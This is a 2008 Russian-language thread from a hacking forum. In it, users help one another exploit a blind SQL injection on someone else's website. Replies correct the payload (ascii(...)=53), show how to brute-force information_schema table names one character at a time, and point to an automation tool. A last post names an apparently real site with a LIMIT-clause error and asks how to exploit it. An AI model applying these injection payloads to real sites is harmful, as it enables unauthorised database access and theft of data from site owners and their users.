Форум АНТИЧАТ - помогите составить запрос !

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - помогите составить запрос ! (https://forum.antichat.xyz/showthread.php?t=74284)

stigmatus

19.06.2008 19:50

помогите составить запрос !

есть бажнии саит ! слепая sql injection!

пример :

Цитата:

http://********/concurs.php?id=4+AND+substring(version(),1,1)=5

резулитат : TRUE

а если :

Цитата:

http://*******/concurs.php?id=4+AND+ascii(lower(substring(version (),1,1)))=5

резулитат : FALSE

почему ????

читал статию http://injection.rulezz.ru/mysql_char_brute.html но чёта не как там описано ! help!

spider-intruder

19.06.2008 19:58

потому что код 5ки во втором запросе должен быть 53

http://*******/concurs.php?id=4+AND+ascii(lower(substring(version (),1,1)))=53

Ты приводиш первый символ значения переменной version() к типу ASCII т.е. к ее коду а он равен 53

stigmatus

19.06.2008 20:04

посиба ! подскажи как составить запрос типа : SELECT table_name from information_schema.tables

stigmatus

19.06.2008 20:05

на том же примере ???

spider-intruder

19.06.2008 20:08

http://*******/concurs.php?id=4+AND+ascii(lower(substring("ЗАП РОС",1,1)))="ПЕРЕБИРАТЬ каждую букву методом схождения"

гдето есть софт для автоматизации процесса даже по слепой инъекции - ищите.
мне некогда )

Ch3ck

19.06.2008 23:47

Bsqlbf2
_https://forum.antichat.ru/threadnav20879-1-10.html

XJIOP

21.06.2008 00:36

народ что можно сдеалть с ошибкой в LIMIT? вот пример где ошибка http://mybits.ws:80/browse.php?page=0.01

Время: 12:03